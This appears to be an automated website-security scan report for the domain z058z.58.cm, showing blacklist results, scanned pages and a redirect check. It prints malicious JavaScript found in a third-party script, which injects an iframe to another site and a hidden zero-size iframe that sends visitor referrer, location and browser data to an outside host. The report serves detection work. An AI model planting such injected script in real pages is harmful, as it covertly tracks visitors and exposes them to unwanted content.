Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=z058z.58.cm
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://z058z.58.cm/
Result: The website is marked by Yandex as SMS-fraud resource. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as SMS-fraud resource. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.z058z.58.cm/ | 200 OK Content-Length: 15061 Content-Type: text/html | clean |
http://js.129uu.com/head.js | 200 OK Content-Length: 1859 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.writeln("<div align=\"center\" style=\"background-color:#FFFFFF;width:100%;\" >");
document.writeln("<iframe src=http://www.61172.com/?do=top MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 frameborder=0 height=2800 width=100%></iframe>"); document.writeln("<\/div>"); function y_gVal(iz) {var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);} yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent); document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count31.51yes.com/sa.htm?id=317142788'+yesdata+' height=0 width=0></iframe>'); Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://count31.51yes.com/sa.htm?id=317142788 <iframe marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no src=http://count31.51yes.com/sa.htm?id=317142788'+yesdata+' height=0 width=0> | ||
http://www.z058z.58.cm/post/?tag=2011%E9%A6%99%E6%B8%AF%E9%A9%AC%E6%8A%A512%E7%94%9F%E8%82%96%E5%9B%BE127 | 200 OK Content-Length: 13075 Content-Type: text/html | clean |
http://www.z058z.58.cm/a-211-2.html | 200 OK Content-Length: 14638 Content-Type: text/html | clean |
http://www.z058z.58.cm/post/?tag=%E5%85%AD%E5%90%88%E7%BD%91%E5%BD%A9%E7%A5%A8%E5%AF%BC%E8%88%AA | 200 OK Content-Length: 13280 Content-Type: text/html | clean |
http://www.z058z.58.cm/a-266-2.html | 200 OK Content-Length: 15025 Content-Type: text/html | clean |
http://www.z058z.58.cm/post/?tag=%E5%85%AD%E5%90%88%E5%BD%A9010%E6%9C%9F%E7%BC%96%E8%80%85%E8%AF%9D%E4%BD%A0%E7%9F%A5 | 200 OK Content-Length: 13651 Content-Type: text/html | clean |
http://www.z058z.58.cm/a-1365-1.html | 200 OK Content-Length: 14395 Content-Type: text/html | clean |
http://www.z058z.58.cm/post/?tag=%E5%99%A2%E9%A6%99%E6%B8%AF49%E9%80%897%E5%8E%86%E5%8F%B2%E7%BA%AA%E5%BD%95 | 200 OK Content-Length: 12796 Content-Type: text/html | clean |
http://www.z058z.58.cm/a-449-1.html | 200 OK Content-Length: 15318 Content-Type: text/html | clean |
http://www.z058z.58.cm/post/?tag=6%E5%92%8C%E5%BD%A931%E6%9C%9F%E5%BC%80%E5%A5%96%E8%AE%B0%E5%BD%95 | 200 OK Content-Length: 13181 Content-Type: text/html | clean |
http://www.z058z.58.cm/a-710-2.html | 200 OK Content-Length: 15757 Content-Type: text/html | clean |
http://www.z058z.58.cm/post/?tag=%E9%A6%99%E6%B8%AF%E8%B5%9B%E9%A9%AC%E4%BC%9A%E6%8C%87%E5%AE%9A%E5%AE%98%E6%96%B9%E7%BD%91%E7%BB%9D%E6%9D%80%E4%BA%8C%E4%B8%AA%E5%8D%8A%E6%B3%A2 | 200 OK Content-Length: 13003 Content-Type: text/html | clean |
http://www.z058z.58.cm/a-877-2.html | 200 OK Content-Length: 15127 Content-Type: text/html | clean |
http://www.z058z.58.cm/post/?tag=%E7%A6%8F%E5%BD%A9%E4%B8%89d%E9%80%89%E5%8F%B7%E6%8A%80%E5%B7%A7 | 200 OK Content-Length: 12818 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: z058z.58.cm
Result:
GET / HTTP/1.1
Host: z058z.58.cm
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: z058z.58.cm
Referer: http://www.google.com/search?q=z058z.58.cm
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: z058z.58.cm
Referer: http://www.google.com/search?q=z058z.58.cm
Result:
The result is similar to the first query. There are no suspicious redirects found.